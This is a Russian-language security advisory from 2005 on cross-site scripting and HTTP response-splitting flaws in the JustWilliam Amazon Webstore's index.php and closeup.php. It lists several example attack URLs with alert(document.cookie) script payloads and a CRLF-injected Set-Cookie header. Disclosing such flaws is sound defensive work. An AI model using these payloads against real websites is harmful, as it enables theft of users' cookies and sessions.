Межсайтовый скриптинг в JustWilliam Amazon Webstore

Дата публикации:
04.05.2005
Всего просмотров:
1016
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: JustWilliam Amazon Webstore

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к важным данным других пользователей.

Уязвимость существует в сценариях 'index.php' и 'closeup.php' из-за недостаточной фильтрации входных данных. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Примеры:

http://[target]/store/uk/product/%22%3E%3Cscript%3
Ealert(document.cookie)%3C/script%3E.htm

http://[target]/store/uk/product/">%0d%0aSet-Cookie:%20
HTTP_response_splitting%3dYES%0d%0aFoo:%20bar.htm

http://[target]/closeup.php?image=3D%22%3E%3
Cscript%3Eal ert(document.cookie)%3C/script%3E

http://[target]/index.php?currentIsExpanded=
3D0%22%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E&currentNumber=3D8

http://[t arget]/index.php?function=3Dsearch&
searchFor=3D%22%3E%3Cscript%3Ealert
(document.cookie)%3C/script%3E

http://[target]/uk/list/c/software_CAD_Technical
_60002_uk.htm?currentNumber=3D4.3%22%
3E%3Cscript%3Ealert(document.cookie)%3C/
script%3E&currentIsExpanded=3D0

URL производителей:
scripts.justwilliams.com/amazon/index.htm

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: JustWilliam's Amazon Webstore Input Validation Holes Permit Cross-Site Scripting Attacks

или введите имя

CAPTCHA